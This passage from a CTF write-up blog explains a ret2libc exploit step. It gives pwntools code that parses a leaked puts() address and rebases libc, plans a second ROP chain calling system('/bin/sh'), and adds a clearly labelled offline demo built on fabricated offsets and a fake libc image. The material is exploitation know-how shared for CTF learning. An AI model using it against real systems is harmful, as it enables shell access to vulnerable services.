The pwntools code that reads the address leaked by this ROP chain and rebases libc on it is below:

```python
import struct

# puts() stops at the first NUL byte, so a 64-bit user-space address comes
# back as only 6 bytes. Grab the first 8 bytes of our output buffer and be
# sure to add back the zeros that we miss due to the string read.
leaked_puts = r.recv()[:8].strip().ljust(8, b'\x00')
# Convert to integer (little-endian unsigned 64-bit)
leaked_puts = struct.unpack('Q', leaked_puts)[0]
# Rebase libc to the leaked offset
libc.address = leaked_puts - libc.symbols['puts']
```

From here, we can create a second ROP chain that simply calls system with /bin/sh. Luckily, the string /bin/sh is already present in libc, so we just find where it lives in the rebased library and call system with its address.
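The two steps above, parsing the leaked pointer and rebasing libc, and then locating the /bin/sh string in the rebased library, are worked through below as an added example. It is not code from the original writeup and does not use pwntools, so it runs offline: the puts offset, the offset of the /bin/sh string, the fake libc image and the load address are all constructed sample values, not taken from any real libc build. It also adds the check a practitioner wants here, that the computed libc base is page aligned, which catches a leak truncated by a stray newline byte or a symbol offset taken from the wrong libc version.

```python
import struct

# Constructed sample values (not from the original writeup or any real libc):
# a hypothetical puts() offset, a hypothetical offset of the "/bin/sh" string,
# a fake libc image containing that string, and a hypothetical load address.
PUTS_OFFSET = 0x6F690
BIN_SH_OFFSET = 0x18CD57
FAKE_LIBC_IMAGE = bytearray(0x190000)
FAKE_LIBC_IMAGE[BIN_SH_OFFSET:BIN_SH_OFFSET + 8] = b"/bin/sh\x00"
SAMPLE_BASE = 0x7FFFF7DD5000


def fake_puts_output(pointer):
    """Model what puts() prints for a pointer: bytes up to the first NUL, then a newline."""
    raw = struct.pack("<Q", pointer)
    return raw.split(b"\x00", 1)[0] + b"\n"


def parse_leak(line):
    """Convert one leaked line (as r.recvline() would return it) to an integer.

    A canonical x86-64 user-space pointer has its top two bytes zero, so puts()
    emits at most six bytes before the NUL stops it. Drop the newline puts()
    appended and right-pad to a full quadword, which is what the writeup's
    .ljust(8, '\\x00') does. If the pointer itself contains a 0x0a byte, the
    line ends early and the value is wrong; rebase_libc() below catches that.
    """
    if line.endswith(b"\n"):
        line = line[:-1]
    if not 1 <= len(line) <= 8:
        raise ValueError("unexpected leak length %d" % len(line))
    return struct.unpack("<Q", line.ljust(8, b"\x00"))[0]


def rebase_libc(leaked_puts, puts_offset=PUTS_OFFSET):
    """libc base = leaked address of puts - offset of puts inside libc."""
    base = leaked_puts - puts_offset
    # libc is mmap'ed at a page boundary; a misaligned base means the leak was
    # truncated or the symbol offset belongs to a different libc build.
    if base & 0xFFF:
        raise ValueError("libc base 0x%x is not page aligned" % base)
    return base


def find_string(base, needle=b"/bin/sh\x00", image=FAKE_LIBC_IMAGE):
    """Runtime address of `needle` in the mapped libc (what libc.search() yields)."""
    off = image.find(needle)
    if off < 0:
        raise LookupError("%r not found in libc image" % needle)
    return base + off


def demo(base=SAMPLE_BASE):
    """Run the whole pipeline on the constructed sample and return the results."""
    leaked_line = fake_puts_output(base + PUTS_OFFSET)  # what the first chain leaks
    leaked_puts = parse_leak(leaked_line)
    libc_base = rebase_libc(leaked_puts)
    bin_sh = find_string(libc_base)
    return leaked_puts, libc_base, bin_sh


if __name__ == "__main__":
    leaked, libc_base, bin_sh = demo()
    print("leaked puts : 0x%x" % leaked)
    print("libc base   : 0x%x" % libc_base)
    print("/bin/sh at  : 0x%x" % bin_sh)
```

With a real target, `fake_puts_output()` is replaced by the bytes pwntools reads back and `FAKE_LIBC_IMAGE` by the actual libc file; the arithmetic and the alignment check stay the same.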

Cory Duplantis

I am a senior security researcher for Cisco Talos and play on Samurai for CTFs. Being happily married, CTFs, tool development, and singing barbershop take up the majority of my time. This blog is the home for my CTF writeups, development tricks, and other random hacker tips.